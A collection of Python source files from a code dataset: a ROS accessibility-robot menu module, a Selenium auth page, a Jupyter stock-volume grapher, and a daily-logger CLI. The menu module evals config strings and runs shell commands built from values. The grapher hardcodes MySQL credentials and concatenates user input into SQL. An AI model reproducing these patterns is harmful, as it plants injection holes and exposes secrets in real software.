rospy.loginfo(\"Trying to connect dynamic_reconfigure client\")\n ReconfigureAction._clients[target_name] \\\n = dynamic_reconfigure.client.Client(target_name, timeout=3)\n except rospy.ROSException:\n rospy.loginfo(\"Timed out connecting dynamic_reconfigure client\")\n\n #return True\n if target_name in ReconfigureAction._clients:\n client = ReconfigureAction._clients[target_name]\n config = target[\"config\"]\n if client is not None:\n temp = {}\n for key in config:\n val = config[key]\n if isinstance(val, (float,int)):\n temp[key] = val * self._menu.value\n elif isinstance(val, str):\n # TODO (security issue)\n value = self._menu.value\n temp[key] = eval(val)\n rospy.loginfo(temp)\n result = client.update_configuration(temp)\n rospy.loginfo(result)\n return True\n self._error_count += 1\n if self._error_count > 10:\n raise RuntimeError(\"dynamic_reconfigure server is not responded\")\n return False\n\nclass SyscommandAction(Action):\n \"\"\"Menu Action for system command\"\"\"\n def __init__(self, config, menu):\n super(SyscommandAction, self).__init__(config, menu)\n self._command = Menu.get_menu_config(config, \"command\", error=True)\n\n def do_action(self):\n rospy.loginfo(\"do_action for system command\")\n command = self._command % (self._menu.value)\n rospy.loginfo(command)\n process = subprocess.Popen(command, preexec_fn=os.setsid, shell=True)\n process.wait()\n return True\n\nclass Event(object):\n def __init__(self, origin, value):\n self.origin = origin\n self.value = value\n\nclass MenuSelectAction(Action):\n \"\"\"Menu Select Action\"\"\"\n def __init__(self, config, menu):\n super(MenuSelectAction, self).__init__(config, menu)\n\n def do_action(self):\n self._menu._menu_selected(self._menu)\n return True\n\nclass Menu(object):\n \"\"\"Menu class\"\"\"\n Undefined = 0\n List = 1\n Action = 2\n Adjust = 3\n\n def _get_path(self, name):\n return \"/\".join([self._name_space, name, \"value\"])\n\n def _get_saved_config(self, name, default=None):\n try:\n return rospy.get_param(self._get_path(name))\n except KeyError:\n if default is not None:\n self._save_config(name, default)\n return default\n\n def _save_config(self, name, value):\n rospy.wait_for_service('/config_manager/set_param')\n service = rospy.ServiceProxy('/config_manager/set_param',\n mongodb_store.srv.SetParam)\n path = self._get_path(name)\n rospy.loginfo(\"%s = %s\", path, str(value))\n service(json.dumps({\"path\":path, \"value\":value}))\n\n @staticmethod\n def get_menu_config(config, name, default=None, error=False):\n \"\"\"Utility function to get config value specified by name.\n if value is not exists return 'default' value\n if error is True and value is not exists raise KeyError\n \"\"\"\n if name in config:\n return config[name]\n elif error:\n raise KeyError(\"Config does not have '%s'\"%name)\n return default\n\n @staticmethod\n def create_menu(config, identifier=None, name_space=None, title=None, usage=None, parent=None):\n if not config:\n return None\n \n \"\"\"Create menu from config\"\"\"\n # refer menu\n menu = config[\"menu\"] if \"menu\" in config else None\n if menu is not None:\n path = \"%s/%s\"%(name_space, menu) if name_space is not None else menu\n config2 = rospy.get_param(path, [])\n return Menu.create_menu(config2, identifier=menu, name_space=name_space, title=title, usage=usage, parent=parent)\n\n # otherwise\n _type = Menu.get_menu_config(config, \"type\", \"item\")\n\n if _type == \"list\":\n return MenuList(config, identifier=identifier, name_space=name_space, parent=parent)\n elif _type == \"adjust\":\n return MenuAdjust(config, identifier=identifier, name_space=name_space, parent=parent)\n elif _type == \"item\":\n return MenuItem(config, identifier=identifier, name_space=name_space, parent=parent)\n\n raise ValueError(\"%s is not a menu type\" % (_type))\n\n\n def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n self._title = Menu.get_menu_config(config, \"title\")\n self._usage = Menu.get_menu_config(config, \"usage\")\n self._type = Menu.Undefined\n self._config = config\n self._identifier = identifier\n self._name_space = name_space\n self._parent = parent\n self._items = []\n self._actions = None\n self._listeners = []\n self.delegate = None\n\n\n def __str__(self):\n text = \"\"\n if self._type == Menu.List:\n text += \"Menu List (%s, %s)\\n\" % (self._identifier, self._title) \\\n + \"\\n\".join([\" \"+str(x) for x in self._items])\n elif self._type == Menu.Action:\n text += \"Menu Action (%s, %s)\" % (self._identifier, self._title)\n elif self._type == Menu.Adjust:\n text += \"Menu Adjust (%s, %s)\" % (self._identifier, self._title)\n else:\n text += super(Menu, self).__str__()\n if self._actions is not None:\n text += \"\\n with Action (%s)\" % (self._actions)\n return text\n\n @property\n def identifier(self):\n \"\"\"Menu identifier\"\"\"\n return self._identifier\n\n @property\n def type(self):\n \"\"\"Menu type\"\"\"\n return self._type\n\n @property\n def title(self):\n \"\"\"Menu title\"\"\"\n return i18n.localized_string(self._title)\n\n @property\n def usage(self):\n \"\"\"Menu usage which is read by TTS\"\"\"\n return i18n.localized_string(self._usage)\n\n @property\n def description(self):\n \"\"\"Description of the menu\"\"\"\n return i18n.localized_string(self._title)\n\n @property\n def value(self):\n \"\"\"Value of the menu\"\"\"\n return None\n\n def sev_value(self, value):\n raise RuntimeError(\"not implemented\")\n\n @property\n def can_explore(self):\n return False\n\n def next(self):\n \"\"\"Move to next item or value\"\"\"\n pass\n\n def prev(self):\n \"\"\"Move to previous item or value\"\"\"\n pass\n\n def select(self):\n \"\"\"Do action for selection\"\"\"\n return self\n\n def reset(self):\n \"\"\"Reset for reuse\"\"\"\n pass\n\n def _menu_selected(self, origin):\n \"\"\"menu selected\"\"\"\n if self.delegate:\n self.delegate.menu_selected(origin)\n if self._parent is not None:\n self._parent._menu_selected(origin)\n\n\nclass MenuList(Menu):\n \"\"\"List of Menu items\"\"\"\n def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n if Menu.get_menu_config(config, \"usage\") is None:\n config[\"usage\"] = \"MENU_NAVIGATE_USAGE\"\n super(MenuList, self).__init__(config=config, identifier=identifier, name_space=name_space, parent=parent)\n\n self._type = Menu.List\n self._actions = Actions.create_actions(config, self)\n\n temp = []\n items = Menu.get_menu_config(config, \"items\")\n for item in items:\n menu_item = Menu.create_menu(item, name_space=self._name_space, parent=self)\n if menu_item:\n temp.append(menu_item)\n else:\n rospy.logerr(\"menu {} is not found\".format(item))\n self._items = temp\n self._current = None\n\n def _get_item(self, diff, default):\n if self._current is None:\n self._current = default\n else:\n self._current = (self._current + diff) % len(self._items)\n\n if self._current is None:\n return None\n return self._items[self._current]\n\n @property\n def value(self):\n \"\"\"Current value\"\"\"\n return self._get_item(0, None)\n\n @property\n def can_explore(self):\n return True\n \n def next(self):\n return self._get_item(+1, 0)\n\n def prev(self):\n return self._get_item(-1, -1)\n\n def select(self):\n if self._actions is not None:\n self._actions.do_action()\n \n return self.value\n\n def get_menu_by_identifier(self, identifier):\n for item in self._items:\n if item._identifier == identifier:\n return item\n return None\n \n @property\n def description(self):\n #return self.value.title if self.value is not None else \"not selected\"\\\n return i18n.localized_string(self.value._title) if self.value is not None else None\n\n def reset(self):\n self._current = None\n for item in self._items:\n item.reset()\n\nclass MenuAdjust(Menu):\n \"\"\"Adjustable menu\"\"\"\n def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n super(MenuAdjust, self).__init__(config=config, identifier=identifier, name_space=name_space, parent=parent)\n self._type = Menu.Adjust\n self._max = Menu.get_menu_config(config, \"max\", error=True)\n self._min = Menu.get_menu_config(config, \"min\", error=True)\n self._values = Menu.get_menu_config(config, \"values\")\n if self._values is not None:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n else:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n if self._min >= self._max:\n raise ValueError(\"min value should be smaller than max value \" \\\n + \"(%f < %f)\"%(self._min, self._max))\n\n self._default = Menu.get_menu_config(config, \"default\", error=True)\n if self._default < self._min or self._max < self._default:\n raise ValueError(\"default value should be in min-max range \" \\\n + \"(%f < %f < %f\" % (self._min,\n self._default,\n self._max))\n\n self._step = Menu.get_menu_config(config, \"step\", 1)\n self._name = Menu.get_menu_config(config, \"name\", error=True)\n self._current = self._get_saved_current()\n self._actions = Actions.create_actions(config, self)\n self._check_action_once()\n \n def _check_action(self):\n if self._actions is None:\n return\n if self._actions.do_action():\n return\n rospy.loginfo(\"retry do_action with %s\", str(self))\n self._check_action_once()\n\n @cabot.util.setInterval(3, 1)\n def _check_action_once(self):\n self._check_action()\n\n\n def _get_saved_current(self):\n temp = self._get_saved_config(self._name, default=self._default)\n if hasattr(self, \"_values\") and self._values is not None and isinstance(temp, str):\n temp = self._values.index(temp)\n return temp if temp is not None else self._default\n\n def _save_current(self):\n if self._actions is not None:\n self._actions.do_action()\n return self._save_config(self._name, self.value)\n\n @property\n def value(self):\n \"\"\"Current value\"\"\"\n if self._values:\n return self._values[self._current]\n return self._current\n\n def set_value(self, value):\n if self._values:\n self._current = self._values.index(value)\n else:\n self._current = value\n self._save_current()\n\n @property\n def can_explore(self):\n return True\n\n @property\n def min(self):\n \"\"\"Minimum value\"\"\"\n return self._min\n\n @property\n def max(self):\n \"\"\"Maximum value\"\"\"\n return self._max\n\n ## intentionally opposite\n def next(self): \n self._current = max(self._current - self._step, self._min)\n self._save_current()\n return self._current\n\n def prev(self):\n self._current = min(self._current + self._step, self._max)\n self._save_current()\n return self._current\n\n def select(self):\n return self\n\n @property\n def description(self):\n rospy.loginfo(\"%s, %s, %s\", self._format, self._current, self.value)\n return (i18n.localized_string(self._format, i18n.localized_string(self.value)) +\n \" \" + i18n.localized_string(self._title))\n\n def reset(self):\n self._current = self._get_saved_current()\n\nclass MenuItem(Menu):\n \"\"\"Menu item with action\"\"\"\n def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n super(MenuItem, self).__init__(config=config, identifier=identifier, name_space=name_space, parent=parent)\n self._type = Menu.Action\n self._value = Menu.get_menu_config(config, \"value\")\n self._format = Menu.get_menu_config(config, \"format\", \"MENU_ITEM_SELECTED\")\n\n @property\n def description(self):\n return i18n.localized_string(self._format, i18n.localized_string(self._title))\n\n @property\n def value(self):\n return self._value\n\n @property\n def can_explore(self):\n return False\n\n def reset(self):\n pass\n\n def select(self):\n pass\n","sub_path":"cabot_ui/src/cabot_ui/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":17931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"268456741","text":"from pages.locators import AuthLocators\nfrom pages.settings import start_url\nfrom pages.elements import WebElement\nfrom pages.base import WebPage\nimport pickle\n\n\nclass AuthPage(WebPage):\n def __init__(self, web_driver, url=start_url):\n super().__init__(web_driver, url)\n self.wait_page_loaded(wait_for_element=self.login)\n\n login = WebElement(xpath=AuthLocators.LOGIN) # поле логина\n email = WebElement(id=AuthLocators.AUTH_EMAIL) # эл. почта для логина\n password = WebElement(id=AuthLocators.AUTH_PASS) # пароль\n auth_btn = WebElement(class_name=AuthLocators.AUTH_BTN) # кнопка Войти\n lk_in = WebElement(xpath=AuthLocators.LK_IN) # имя пользователя\n\n\nclass AuthPageCook(WebPage):\n def __init__(self, web_driver, url=start_url):\n super().__init__(web_driver, url)\n\n with open('tmall_cookies.pkl', 'rb') as cookiesfile:\n cookies = pickle.load(cookiesfile)\n for cookie in cookies:\n web_driver.add_cookie(cookie)\n web_driver.refresh()\n\n lk_in = WebElement(xpath=AuthLocators.LK_IN)\n","sub_path":"pages/auth_page.py","file_name":"auth_page.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"268350552","text":"# Main Program\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import display\nfrom IPython import display as dis\nimport pandas\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\nfrom datetime import datetime\nimport warnings\nimport mpld3\nfrom mpld3 import plugins, utils\nimport mysql.connector\nfrom LineHTMLTooltip import LineHTMLTooltip\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n# Some global variables\ncss = \"\"\"\ntable\n{\n border-collapse: collapse;\n}\nth\n{\n color: #ffffff;\n background-color: #000000;\n width:75px\n}\ntd\n{\n background-color: #cccccc;\n width:120px;\n}\ntable, th, td\n{\n font-family:Arial, Helvetica, sans-serif;\n border: 1px solid black;\n text-align: right;\n}\n\"\"\"\n\nticker = None\nexchange = None\nweeks = None\nstart = None\nend = None\nmarks = []\nlines = []\nfreq = datetime.strptime('1024-01-01', '%Y-%m-%d')\n\ntry:\n cnx = mysql.connector.connect(user='sql3125187', password='3cyKenpt51', host='sql3.freemysqlhosting.net', database='sql3125187')\n cursor = cnx.cursor()\nexcept:\n cnx = False\n cursor = False\n query_valid.value = 'Unable to connect to database'\n\ndef get_history():\n history = []\n if not cnx:\n return ['Other']\n cursor.execute(\"SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'sql3125187'\")\n for s in cursor.fetchall():\n history.append([s[0], 0])\n\n for i in range(len(history)):\n cursor.execute(\"SELECT volume FROM \" + history[i][0] + \" WHERE date = '\" + freq.strftime('%Y-%m-%d') + \"'\")\n for s in cursor.fetchall():\n history[i][1] = int(s[0])\n if '_' in history[i][0]:\n history[i][0] = history[i][0][:history[i][0].index('_')]\n history.sort(key=lambda tup: tup[1]) \n history = history[-10:]\n history.sort(key=lambda tup: tup[0])\n return ['Other'] + [hs[0] for hs in history]\n \n\n# Ticker info form\nticker_dropdown = widgets.Dropdown(options=get_history(), value='Other', description='Ticker')\nticker_in = widgets.Text(description='Ticker', value='')\nexchange_in = widgets.Dropdown(options=['NYSE', 'NASDAQ', 'TSE'], value='NYSE', description='Exchange')\nstart_in = widgets.Text(description='Start', value='YYYY-MM-DD')\nstart_valid = widgets.HTML('')\nend_in = widgets.Text(description='End', value='YYYY-MM-DD')\ntoday = widgets.Checkbox(description='Today', value=False)\n\nend_valid = widgets.HTML('')\ngo = widgets.Button(description='Update Graph')\nquery_valid = widgets.HTML('')\n\nfetch = widgets.Box(children=[ticker_dropdown, ticker_in, exchange_in, start_in, start_valid, end_in, today, end_valid, go, query_valid])\n\n# Markup draw form\nmarkup_intro = widgets.HTML('Rectangle Drawer
Enter the week numbers each of the two points')\nmarkup_start = widgets.Text(description='Point 1', value='')\nmarkup_end = widgets.Text(description='Point 2', value='')\nmarkup_draw = widgets.Button(description='Draw')\nmarkup_warning = widgets.HTML('')\n\nrectangle = widgets.VBox(children=[markup_intro, markup_start, markup_end, markup_draw, markup_warning])\n\n# Line draw form\nline_intro = widgets.HTML('Trend Line Drawer
Enter the week numbers of two points on the line and indicate whether it is an upper or lower trendline.')\nline_start = widgets.Text(description='Point 1', value='')\nline_end = widgets.Text(description='Point 2', value='')\nline_hilo = widgets.Dropdown(options=['High', 'Low'], value='High')\nline_button = widgets.Button(description='Draw')\nline_warning = widgets.HTML('')\n\nline = widgets.VBox(children=[line_intro, line_start, line_end, line_hilo, line_button, line_warning])\n\nmarkup = widgets.HBox(children=[rectangle, line])\n\ntabs = widgets.Tab(children=[fetch, markup])\n\ntabs.set_title(0, 'Graph')\ntabs.set_title(1, 'Markup')\n\ndisplay(tabs)\n\ndef get_data():\n global ticker, exchange, weeks, start, end\n \n ticker = ticker_dropdown.value\n if ticker == 'Other':\n ticker = ticker_in.value\n \n exchange = exchange_in.value\n if exchange == 'TSE':\n ticker = ticker + \".TO\"\n \n start = False\n end = False\n \n try:\n start_valid.value = ''\n start = datetime.strptime(start_in.value, '%Y-%m-%d')\n except:\n start = False\n start_valid.value = 'Invalid Start Date'\n \n try:\n end_valid.value = ''\n end = datetime.strptime(end_in.value, '%Y-%m-%d')\n except:\n end = False\n end_valid.value = 'Invalid End Date'\n \n if start == False or end == False:\n return\n \n url = \"http://real-chart.finance.yahoo.com/table.csv?s=\"\n url = url + ticker\n url = url + str(\"&a=%d&b=%d&c=%d&d=%d&e=%d&f=%d&g=d&ignore=.csv\" % (start.month - 1, start.day, start.year, end.month-1, end.day, end.year))\n \n try:\n query_valid.value = ''\n data = pandas.read_csv(url, parse_dates=True)\n data = data.reindex(index = data.index[::-1]).reset_index()\n data[data.columns[1]] = pandas.to_datetime(data[data.columns[1]])\n if data.empty:\n raise Exception(\"Stuff didn't happen\")\n try:\n cursor.execute(\"SELECT * FROM \" + ticker.replace('.', '_'))\n cursor.fetchall()\n cursor.execute(\"UPDATE \" + ticker.replace('.', '_') + \" SET volume = volume + 1 WHERE date = '\" + freq.strftime('%Y-%m-%d') + \"'\")\n cnx.commit()\n\n except:\n e = sys.exc_info()[0]\n write_to_page( \"

Error: %s

\" % e )\n make_table = (\"CREATE TABLE \" + ticker.replace('.', '_') + \" (date datetime, high float, low float, close float, volume bigint)\")\n cursor.execute(make_table)\n cnx.commit()\n add_data = (\"INSERT INTO \" + ticker.replace('.', '_') + \" (date, high, low, close, volume) VALUES (%s, %s, %s, %s, %s)\")\n cursor.execute(add_data, (datetime.strptime('1024-01-01', '%Y-%m-%d'), 0, 0, 0, 1))\n cnx.commit()\n except:\n try:\n query_valid.value = \"Can't access Yahoo Finance. Connecting to database.\"\n get_data = (\"SELECT * FROM \" + ticker.replace('.', '_') + \" WHERE date BETWEEN %s AND %s\")\n cursor.execute(get_data, (start, end))\n data = pandas.DataFrame(columns=('Date', 'High', 'Low', 'Close', 'Volume'))\n index = 0\n for s in cursor.fetchall():\n data.loc[index] = (s[0].strftime('%Y-%m-%d'), s[1], s[2], s[3], s[4])\n index = index + 1\n data = data.reindex(index = data.index[::1]).reset_index()\n except:\n query_valid.value = 'Invalid Query'\n return False\n data[data.columns[1]] = pandas.to_datetime(data[data.columns[1]])\n data['Cumulative'] = data['Volume'].cumsum() - data['Volume']\n \n # Create weekly data\n weeks = pandas.DataFrame(columns=['High', 'Low', 'Volume', 'Prev', 'Close', 'Days', 'Start', 'End'])\n index = 0\n weeks.loc[0] = (0, 0, 0, 0, 0, 0, 0, 0)\n yesterday = 6\n for i, row in data.iterrows():\n if row[1].weekday() < yesterday:\n index = index + 1\n weeks.loc[index] = (row['High'],\n row['Low'],\n 0,\n weeks.loc[index - 1][3] + weeks.loc[index - 1][2],\n 0,\n 0,\n row[1],\n row[1])\n yesterday = row[1].weekday()\n weeks.loc[index] = (max(row['High'], weeks.loc[index][0]),\n min(row['Low'], weeks.loc[index][1]),\n row['Volume'] + weeks.loc[index][2],\n weeks.loc[index][3],\n row['Close'],\n weeks.loc[index][5] + 1,\n weeks.loc[index][6],\n row[1])\n\n weeks = weeks[1:]\n\ndef draw_graph():\n # refresh the graph\n plt.close()\n dis.clear_output()\n fig, ax = plt.subplots()\n \n # draw bar graph\n ax.set_title(ticker + \": \" + start.strftime(\"%b %d, %Y\") + \" - \" + end.strftime(\"%b %d, %Y\"), fontsize=15)\n bars = ax.bar(weeks['Prev']/1000000.0,\n weeks['High'] - weeks['Low'],\n width=weeks['Volume']/1000000.0,\n bottom=weeks['Low'])\n ax.plot((weeks['Prev'] + weeks['Volume'])/1000000.0, weeks['Close'], '_', mew = 2, ms = 4, color='r')\n \n ylims = ax.get_ylim()\n \n # draw markups\n for mk in marks:\n x1 = weeks.loc[mk[0]][3]/1000000.0\n y = max(weeks.loc[mk[0]][0], weeks.loc[mk[1]][0])\n x2 = weeks.loc[mk[1]][3]/1000000.0\n ax.plot([x1, x1], [0, y], linestyle = '-', linewidth = 2, color = 'k')\n ax.plot([x2, x2], [0, y], linestyle = '-', linewidth = 2, color = 'k')\n \n x3 = max(x1, x2) + abs(x1 - x2)\n ax.plot([x3, x3], [0, y], linestyle = '-', linewidth = 2, color = 'k')\n ax.plot([min(x1, x2), x3], [y, y], linestyle = '-', linewidth = 2, color = 'k')\n \n xlims = ax.get_xlim()\n \n # draw lines\n for ln in lines:\n x1 = weeks.loc[ln[0]][3]/1000000.0\n x2 = weeks.loc[ln[2]][3]/1000000.0\n if ln[1] == 'High':\n y1 = weeks.loc[ln[0]][0]\n y2 = weeks.loc[ln[2]][0]\n else:\n y1 = weeks.loc[ln[0]][1]\n y2 = weeks.loc[ln[2]][1]\n minx = min(x1, x2)\n if x1 < x2:\n miny = y1\n else:\n miny = y2\n ax.plot([minx, xlims[1]], [miny, (xlims[1] - minx)*(y2-y1)/(x2-x1)+miny], linestyle = '-', linewidth = 2, color = 'm')\n \n ax.set_xlim(xlims)\n ax.set_ylim(ylims)\n ax.set_ylabel(\"Price\", fontsize=14,labelpad = 10)\n ax.set_xlabel(\"Volume (millions)\", fontsize=14,labelpad = 10)\n plt.locator_params(axis='x',nbins=4)\n ax.grid(True, alpha=0.3)\n \n \n # add annotations\n for j, bar in enumerate(bars.get_children()):\n popup=str('\\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n
Week #%d
Start%s
End%s
High%.2f
Low%.2f
Close%.2f
Volume%s
' % (j+1,\n weeks.loc[j+1][6].strftime('%Y-%m-%d'),\n weeks.loc[j+1][7].strftime('%Y-%m-%d'),\n weeks.loc[j+1][0],\n weeks.loc[j+1][1],\n weeks.loc[j+1][4],\n \"{:,}\".format(weeks.loc[j+1][2])))\n tooltip = LineHTMLTooltip(bar, label=popup, css=css)\n plugins.connect(fig, tooltip)\n plugins.connect(fig, plugins.MousePosition(fontsize=14))\n display(mpld3.display())\n\ndef on_markup(b):\n markup_warning.value = ''\n global marks\n startval = int(markup_start.value)\n endval = int(markup_end.value)\n if startval < 0 or startval > len(weeks):\n markup_warning.value = \"Point 1 out of range\"\n return\n if endval < 0 or endval > len(weeks):\n markup_warning.value = \"Point 2 out of range\"\n return\n marks = []\n marks.append([int(markup_start.value), int(markup_end.value)])\n draw_graph()\n\ndef on_line(b):\n line_warning.value = ''\n global lines\n startval = int(line_start.value)\n endval = int(line_end.value)\n if startval < 0 or startval > len(weeks):\n line_warning.value = \"Point 1 out of range\"\n return\n if endval < 0 or endval > len(weeks):\n line_warning.value = \"Point 2 out of range\"\n return\n lines.append([int(startval), line_hilo.value, int(endval)])\n draw_graph()\n line_start.value = ''\n line_end.value = ''\n line_hilo.value = 'High'\n \ndef on_go(b):\n global marks, lines\n marks = []\n lines = []\n markup_start.value=''\n markup_end.value=''\n if not get_data() == False:\n draw_graph()\n \ndef on_today(b):\n if today.value == True:\n end_in.value = datetime.today().strftime('%Y-%m-%d')\n else:\n end_in.value = 'YYYY-MM-DD'\n\ndef on_other(b):\n if ticker_dropdown.value == 'Other':\n ticker_in.visible = True\n else:\n ticker_in.visible = False\n\nticker_dropdown.on_trait_change(on_other)\ntoday.on_trait_change(on_today)\ngo.on_click(on_go)\nmarkup_draw.on_click(on_markup)\nline_button.on_click(on_line)\n","sub_path":"stockgraph.py","file_name":"stockgraph.py","file_ext":"py","file_size_in_byte":12917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"122390520","text":"import os\nimport sys\nimport time\nimport datetime\n\nfrom trackable import Trackable\nfrom validator import Validator\nfrom time_manager import TimeManager, WEEKDAYS\nfrom log_manager import LogManager, LOG_FILE\n\nos.chdir(os.path.dirname(os.path.abspath(__file__))) # To locate *.json files\nlog_mgr = LogManager()\ntime_mgr = TimeManager()\nvalidator = Validator()\n\n\ndef clear():\n if os.name == 'nt':\n _ = os.system('cls')\n else:\n _ = os.system('clear && printf \"\\e[3J\"')\n\n\ndef home_view():\n while 1:\n missed_days = time_mgr.get_all_missed_days(log_mgr)\n clear()\n print(\"Daily Logger v.2.1\\n\")\n if len(missed_days) > 0:\n print(\" Dear user, your log is inconsistent.\")\n print(\" Press Enter to fill the gaps!\\n\")\n print(\" Or pick one of the options below:\")\n else:\n print(\" Welcome back, dear user! Your log is up to date! Good job!\\n\")\n print(\" m > log specfic date\")\n print(\" n > create new trackable\")\n print(\" d > delete existing trackable\")\n print(\" l > list all trackables\")\n # print(\" e > edit existing trackable\") # Coming soon... maybe?\n # print(\" a > show analytics\")\n print(\" s > show log\")\n print(\" q > exit\\n\")\n inp = input(\">>> \").strip().lower()\n if inp == \"\" and len(missed_days) > 0:\n missed_days_view(missed_days)\n elif inp == \"m\":\n log_mgr_menu_view()\n elif inp == \"n\":\n creation_view()\n elif inp == \"d\":\n deletion_view()\n elif inp == \"e\":\n edit_view()\n elif inp == \"l\":\n list_view()\n elif inp == \"s\":\n show_log_view()\n # elif inp == \"a\":\n # analytcs_view()\n elif inp == \"q\":\n clear()\n sys.exit()\n else:\n pass\n\n\ndef missed_days_view(missed_days):\n while 1:\n clear()\n print(\"Daily Logger v.2.1\\n\")\n if len(missed_days) == 0:\n print(\" Your log is up to date!\")\n elif len(missed_days) > 1:\n print(\" You didn't log these days:\\n\")\n else:\n print(\" One day to log:\\n\")\n for day in missed_days:\n print(\" - {}, {}\".format(day, WEEKDAYS[datetime.datetime.strptime(day, \"%Y-%m-%d\").weekday()]))\n inp = input(\"\\nContinue? [yes]: \").lower()\n if inp == \"\" or inp.lower() in validator.truths:\n for day in missed_days:\n log_mgr_confirmation_view(day)\n clear()\n break\n else:\n clear()\n break\n\n\ndef log_mgr_menu_view():\n while 1:\n tday = time_mgr.today()\n clear()\n print(\"Logger Menu\\n\")\n print(\" Enter > log the passed day ({})\".format(tday))\n print(\" YYMMDD > log a particular date\")\n print(\" num > 2-digit-max timedelta between today and some point in past\")\n print(\" h > go back home\")\n print(\" q > quit\\n\")\n inp = input(\"Specify the day: \").strip().lower()\n day = None\n if inp == \"\":\n day = tday\n elif inp == \"h\":\n break\n elif inp == \"q\":\n clear()\n sys.exit()\n elif len(inp) >= 6:\n day = time_mgr.get_specific_date(inp)\n elif len(inp) <= 2:\n for i in inp:\n if not i.isdigit():\n break\n else:\n day = time_mgr.n_days_ago(inp)\n if day:\n log_mgr_confirmation_view(day)\n break\n\n\ndef log_mgr_confirmation_view(day):\n while 1:\n clear()\n print(\"\\n You're about to log {}, {}\".format(day,\n WEEKDAYS[datetime.datetime.strptime(day, \"%Y-%m-%d\").weekday()]))\n inp = input(\"\\nGoing on? [yes]: \").strip().lower()\n if inp == \"\":\n log_mgr_user_input_view(day)\n break\n else:\n break\n\n\ndef log_mgr_user_input_view(day):\n entry = {day: {}}\n for t in log_mgr.get_trackables():\n if not time_mgr.check_date(day, t):\n continue\n valid = False\n while not valid:\n clear()\n print(\"You are logging {}\\n\".format(day))\n answer = input(\" \" + t.question + \" \")\n valid = validator.validate_answer_type(answer, t)\n if valid:\n valid = validator.validate_range(answer, t.low, t.high)\n answer = validator.process_answer(answer, t)\n entry[day][t.name] = t.get_answer_type()(answer)\n log_mgr.log_day(entry)\n clear()\n print(day, \"successfuly logged!\")\n time.sleep(2)\n clear()\n\n\ndef show_log_view():\n clear()\n print(\"Your log:\")\n with open(LOG_FILE, \"r\") as f:\n for line in f:\n print(line, end=\"\")\n input(\"\\n\\nPress Enter\")\n\n\ndef creation_view():\n valid = False\n while not valid:\n clear()\n n = input(\"Creating new trackable\\n\\n Enter trackable's name: \")\n valid = validator.validate_name(n, log_mgr.get_trackables())\n valid = False\n while not valid:\n clear()\n q = input(\"Creating new trackable\\n\\n Enter the question you want to be asked: \").strip()\n valid = validator.validate_question(q)\n valid = False\n while not valid:\n clear()\n t = input(\n \"Creating new trackable\\n\\n Enter the answer type (str/bool/int/float) (default str): \").strip().lower()\n valid = validator.validate_input_type(t)\n l, h = None, None\n if t == \"int\" or t == \"float\":\n clear()\n l = int(float(input(\"Creating new trackable\\n\\n Enter lower bound (int): \")))\n clear()\n h = int(float(input(\"Creating new trackable\\n\\n Enter upper bound (int, inclusive): \")))\n clear()\n p = input(\"Creating new trackable\\n\\n How frequently the trackable should be tracked? (default: every day): \")\n clear()\n if t == \"\":\n t = \"str\"\n if p == \"\":\n p = \"W1111111\"\n if q[-1] != \"?\":\n q += \"?\"\n q = q.capitalize()\n log_mgr.create_trackable(n, q, t, l, h, p)\n clear()\n print(\"\\n New trackable created!\")\n time.sleep(1)\n\n\ndef list_view():\n clear()\n trackables = log_mgr.get_trackables()\n if len(trackables) == 0:\n print(\"\\n You have nothing to track yet\\n\")\n else:\n print(\"Your trackables:\\n\")\n for t in trackables:\n print(\" - {}\".format(t.get_beautiful_name()))\n print(\" question: {}\".format(t.question))\n print(\" type: {}\".format(t.answer_type))\n if t.low is not None:\n print(\" lower: {}\".format(t.low))\n print(\" upper: {}\".format(t.high))\n print(\" period: {}\\n\".format(t.period))\n print(\" {} trackables at all\\n\".format(len(trackables)))\n input(\"Press Enter\")\n\n\ndef deletion_view():\n clear()\n trackables = log_mgr.get_trackables()\n d = {i + 1: t for i, t in enumerate(trackables)}\n print(\"Deletion Menu\\n\")\n for i in range(1, len(trackables) + 1):\n print(\" {} - {}\".format(i, d[i].get_beautiful_name()))\n code = input(\"\\nEnter code to delete trackable \\nType anything else to abort: \")\n try:\n if int(code) in d:\n deletion_confirmation_view(d[int(code)])\n except:\n pass\n\n\ndef deletion_confirmation_view(trackable):\n clear()\n print(\"\\n\\nWARNING!\\n You are about to delete '{}' trackable.\".format(trackable.get_beautiful_name()))\n inp = input(\" Are you sure you want to proceed (y/n)? \")\n if inp == \"y\" or inp == \"Y\" or inp == \"\":\n log_mgr.delete_trackable(trackable)\n clear()\n print(\"\\n Trackable '{}' is deleted\".format(trackable.get_beautiful_name()))\n time.sleep(1.5)\n else:\n clear()\n print(\"\\n\\n No changes made\")\n time.sleep(1.5)\n\n\ndef edit_view(): # To edit trackables' names, questions, ranges, and periods\n pass # We don't edit ans_type because it would affect log consistency\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"264251040","text":"import os\nimport torch\nimport torch.nn.functional as F\nimport time\nimport numpy as np\nfrom training.load_data import get_batch\nimport torch.utils.data as Data\nfrom tensorboardX import SummaryWriter\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom sklearn.metrics import confusion_matrix, precision_score, accuracy_score, recall_score, f1_score\n\ndef cal_performance(pred, gold, smoothing=False):\n ''' Apply label smoothing if needed '''\n\n loss = cal_loss(pred, gold, 